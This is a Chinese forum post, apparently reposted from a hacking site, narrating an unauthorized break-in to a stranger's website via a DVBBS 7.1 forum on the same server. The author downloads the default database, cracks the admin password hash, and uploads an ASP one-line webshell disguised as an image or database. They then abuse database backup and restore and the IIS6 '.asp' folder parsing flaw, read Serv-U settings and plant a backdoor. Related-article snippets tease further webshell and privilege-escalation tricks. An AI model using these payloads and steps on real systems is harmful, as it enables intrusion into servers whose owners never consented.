DVBBS7.1后台备份得到一个webshell

转自:http://www.wrsky.com/read.php?tid=565
作者:firefox+lvhuana

今天上午上网的时候,非常无聊,好友都不在线。

正在无聊的时候,突然qq响了,一个陌生人要加我,顺便先看下他的资料,哦哦,原来这个人还有个人站点呢,通过他加我请求。然后开始看他的个人站点,原来是一个外挂站,晕糊中,外挂站点的人加我作什么。。。。

想想进他的站点看看吧,打开明小子的旁注工具2.2版本(这个启动速度快,我喜欢),扫了一下,看到他站点所在的服务器上面还有几个站点,再仔细扫了一下,发现一个dvbbs7.1的论坛的数据库是默认的dvbbs7.mdb,下载之,然后杀毒软件查下没有木马存在(现在有些无聊的人喜欢放一个默认数据库名字的木马来钓鱼。。小心为好),打开数据库找到管理员的后台账号密码和前台账号密码散列,破解一下吧,运气不错,几分钟md5的散列破解完毕了,全数字的前台密码。

登陆进去,再登陆进后台。好久不搞国内站了,手生中。。。。老思路,上传一个自己制作的asp语句插入gif图片中的asp木马(当然是更改为.gif了)。上传成功,然后到后台去还原数据库去,晕乎乎的,怎么提示无法识别的数据库格式,失败了。。看来动网现在成熟的多了,估计是对文件的头部做了识别了??接着想办法吧。。

看到现在7.1版本的都有了blog功能了,在后台看看blog设置吧,突然看到有上传设置哦,而且还可以设置上传类型,增加一个mdb的文件格式吧,不错不错,增加成功。然后自己在本地建立一个空的mdb数据库,里面的内容为<%eval(request(\"lv\"))%>,然后把这个数据库上传,成功上传,再晕,怎么不是直接显示出相对路径的?而是fileid=1。。再到后台的blog管理那里找,找到上传的文件夹是Boke/UploadFile/,然后在上传管理那里找到了我上传的mdb文件,这下看看动网还能禁止我还原数据库么!?

成功还原数据库为.asp了,嘿嘿,一个webshell到手了,然后进入服务器,发现是win2k3的哦,看来执行cmd是没戏了,到处转转后找到d盘竟然能遍历,还有ser-u安装在d盘啊,浏览ServUDaemon.ini找到了目标站的物理路径,跳转到目标站的目录,然后留后门,好了,玩完了,撤退。

鉴于是win2k3系统的,大家都应该知道win2k3的一个文件夹名如果是.asp的话,这个文件夹里面的任何文件都做为asp来处理的,让我们再深入测试一下。在后台备份那里把备份路径改一下,改为.asp/,如果害怕失败的话,就用url编码一下那个.,就是%2easp/,然后备份数据库,这样就会得到一个.asp的目录,然后在上传设置那里把文件上传目录设置为.asp/,这样的话,所有的文件都上传到这个文件夹里了。回到前台,上传我的那个把一句话木马插入gif文件的那个2006s.gif,上传成功后,http://www.****.com/.asp/2006-2/200622714435439658.gif这个就是我们的shell了。用客户端连接,得到一个2006的webshell,不过输入密码后进入的时候会返回一个404错误,原因是ie把.asp后面的省略了,再次把http://www.*****.com/.asp/2006-2/200622714435439658.gif放在?%23=Execute(Session(%22%23%22))&pageName=PageList前面,seesion欺骗了一下,这个webshell就能正常使用了。

垃圾文章,可能还有其他更简单的方法,希望大家谁知道告诉一下。

(0)

相关推荐

  • DVBBS7.1后台备份得到一个webshell

    转自:http://www.wrsky.com/read.php?tid=565 作者:firefox+lvhuana 今天上午上网的时候,非常无聊,好友都不在线. 正在无聊的时候,突然qq响了,一个陌生人要加我,顺便先看下他的资料,哦哦,原来这个人还有个人站点呢,通过他加我请求.然后开始看他的个人站点,原来是一个外挂站,晕糊中,外挂站点的人加我作什么.... 想想进他的站点看看吧,打开明小子的旁注工具2.2版本(这个启动速度快,我喜欢),扫了一下,看到他站点所在的服务器上面还有几个站点,再仔细

  • 利用BBSxp后台的缺陷得到webshell

    遇一BBSXP后台: 查看源文件.也没有value可以自定义. 尝试修改上传类型. 无奈不支持php aspx. 向数据库里插入一句话再备份. 出现些XXX 估计表里加入了什么东.. 访问: /bbs/Admin_fso.asp?menu=files&dir=../ 可以看到整站文件.. 找到一个文件名不常见的后台.. 运气不错. 备份webshell之..

  • PHP后台备份MySQL数据库的源码实例

    PHP 备份 mysql 数据库的源代码,在完善的 PHP+Mysql 项目中,在后台都会有备份 Mysql 数据库的功能,有了这个功能,对于一些不便自己写shell脚本备份的VPS来说,就不用使用 FTP 或者使用 mysql 的管理工具进行 mysql 数据库备份下载,非常方便. 下面是一个php数据库备份的源代码,大家也可以根据自己的需求进行修改. <?php // 备份数据库 $host = "localhost"; $user = "root"; /

  • 如何恢复数据库备份到一个已存在的正在使用的数据库上

    USE master  -- (Can’t sit in the database whilst its being restored!) GO ALTER DATABASE MyDatabase SET SINGLE_USER WITH ROLLBACK IMMEDIATE GO -- Restore Full Backup RESTORE DATABASE MyDatabase FROM DISK = ’x:\MSSQL\BACKUP\MyBackupFilename_Full.BAK’ W

  • dvbbs7.1 照样从后台得到webshell

    文章作者:喜欢忧伤 信息来源:邪恶八进制安全小组 背景: dvbbs7.1在后台备份里面加了access数据库检查了.所以原来的gif图片恢复成后门已经不行了 解决办法: 我把asp木马插入到数据库里,然后恢复.这样肯定检查肯定可以通过的. 具体过程: 前提: (偶以默认的安装情况为准,具体情况的把握靠自己了.) 你得到论坛dvbbs7.1后台. 1.偶已经作好一个数据库了:里面插入了加密的asp后门[就是那个写马的后门] 同时已经修改名字成dvbbsToshell.gif(文章最后有下载)了

  • 教你利用Log备份获取Webshell

    Blog被人渗透了一下,不知道各位掉了什么东西没有.原来有一次blog的目录可以列出来,那次我掉了一个小东西,然后今天别人告诉我NBSI 3用了那个东西的方法--呵呵,有点晕,就是下面的,成功率还是很高的,大家可以试试看.嗯,方法流出去无所谓,文章留着吧.  dbowner通过注射得到一个shell应该不是什么难事情了,比较麻烦的是就算利用增量备份,仍然有很多不确定的因素,如果之前别人有过什么错误的写入信息,可能备份出来得到的还是一些不能用的500错误,如何能够提高成功率及重用性呢?如果单从调整

  • DEDECMS后台数据备份还原的应用

    备份 1安装DEDECMS(网站地址/install 开始安装) 2后台添加栏目-内容等(添加一些数据) 3后台更新全站为HTML(前台生成) 4后台备份数据库(开始备份) 5保留备份后的数据库 把此目录文件全部保留\dede\backup_data 其他的全部不要,如果有附件例外 就成功完成了备份 还原 1安装DEDECMS(网站地址/install 开始安装) 2\dede\backup_data 把备份的文件放入这个目录 3进入后台点还原数据库--(就还原成功) 4后台生成HTML成功更新

  • 用shell写一个mysql数据备份脚本

    思路 其实很简单 写一个shell脚本通过mysql的mysqldump,将数据导出成对应的sql文件:使用linux的crontab定时运行对应脚本,将sql,文件保存到对应的目录下:可想而知,随着数据量的增加和备份的频率都会导致备份服务器的硬盘资源使用率也会直线攀升:为了解决这个问题,我们就需要,定时清理备份内容:而我还是简单的使用了个shell脚本,通过crontab定时去清理: 注意 这里有几个问题需要注意的: 通过mysqldump来导出对应的库表的sql,这样必然会造成mysql服务

  • 超全的webshell权限提升方法

    WEBSHELL权限提升技巧  c: d: e:.....  C:\Documents and Settings\All Users\「开始」菜单\程序\  看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径,  C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\  看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere密码,登陆  c:\Pr

  • webshell权限提升技巧

    WEBSHELL权限提升技巧 c: d: e:.....  C:\Documents and Settings\All Users\「开始」菜单\程序\  看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径,  C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\  看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere密码,登陆  c:\Pro

随机推荐